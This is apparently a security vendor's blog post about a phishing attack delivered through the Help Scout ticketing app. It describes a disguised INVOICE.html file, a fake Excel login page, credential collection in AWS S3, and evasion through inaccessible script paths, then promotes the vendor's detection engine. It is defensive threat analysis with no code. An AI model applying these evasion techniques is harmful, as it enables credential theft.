In an era where customer support SaaS platforms like Help Scout and Zendesk have long been integral to business operations, these apps have also become prime targets for threat actors, often delivered via the enterprise browser.
The inherent trust users have in these tools, combined with the high volume of data exchange, makes them attractive vectors for advanced phishing and malware attempts. In this blog, we’ll dissect a highly evasive targeted phishing attack coming in through the Help Scout web application.
Attack Overview and Execution
This attack leveraged the enterprise browser, targeting Help Scout – a popular customer communication and ticketing system. Help Scout streamlines support by centralizing customer requests into tickets, making it a critical touchpoint for support agents. The phishing attempt involved an HTML file named “INVOICE.html” delivered through this system. To the targeted support agent, this file would appear as a regular support ticket, possibly containing a customer request or invoice details. However, it was cleverly designed to appear as if it originated from a secure URL, thereby evading standard browser security checks.
Help Scout, the ticketing platform used the targeted user, Source: https://www.helpscout.com/
- Malicious File Transmission: The HTML file containing malicious content was sent to the target user, bypassing initial web security checks by disguising its origin.
- Exploitation of Cloud Services: The attacker’s strategy included the use of AWS S3 Buckets to store the malicious HTML and JavaScript files. This setup facilitated a redirection scheme, funneling POST requests to a URL likely connected to the attacker’s own AWS bucket. The primary objective was to capture and store compromised credentials, with the fake login form mimicking Microsoft Excel and even pre-injecting the specific target’s username.
The phishing form impersonating Microsoft Excel
Evasive Maneuvers and Technical Prowess
The sophistication of this HTML-based phishing was further exemplified by the evasive maneuvers employed by the threat actor:
- Evasion via Inaccessible Script Paths: The attacker embedded scripts from paths that were inaccessible when viewed as a standalone document, a tactic aimed at circumventing security systems like Secure Web Gateways and Firewalls that scan file content for threats.
- Response Code Manipulation: Despite these evasion tactics, when the scripts were accessed directly as part of the URL linked to the compromised credentials, they responded with a 200 status code. This “success” signal indicated successful communication with the attacker’s setup and suggested that the evasion was partly designed to cloak the server response from standard security checks.
The attacker inserted code from another path that is not accessible when accessed as HTML file
Detection and Neutralization: Advanced Browser Security in Action
When the user downloads the file from Help Scout, Perception Point’s advanced detection engines, featuring proprietary ML algorithms, kick into action. The system’s intricate design, inspired by the human immune system, allows for a comprehensive analysis of the HTML code. Dubbed MAPR (Maliciously Associated Pattern Recognizer), this detection engine utilizes a biomimicry approach, akin to pattern recognition receptors in human biology, to detect DNA anomalies.
The prevented phishing attack on Perception Point’s XRay console (10 seconds scanning time)
Perception Point’s groundbreaking MAPR employs a trio of detection agents—Leaf, Brackets, and Concatenate Tags—to dissect and analyze every facet of the HTML file. From scrutinizing each leaf node in the code’s tree structure to monitoring patterns within brackets and concatenating HTML tags with their attributes, MAPR ensures a comprehensive inspection. This AI-driven, bio-inspired approach not only identifies but also adapts to new threats, providing a robust defense against sophisticated phishing attempts delivered via HTML files.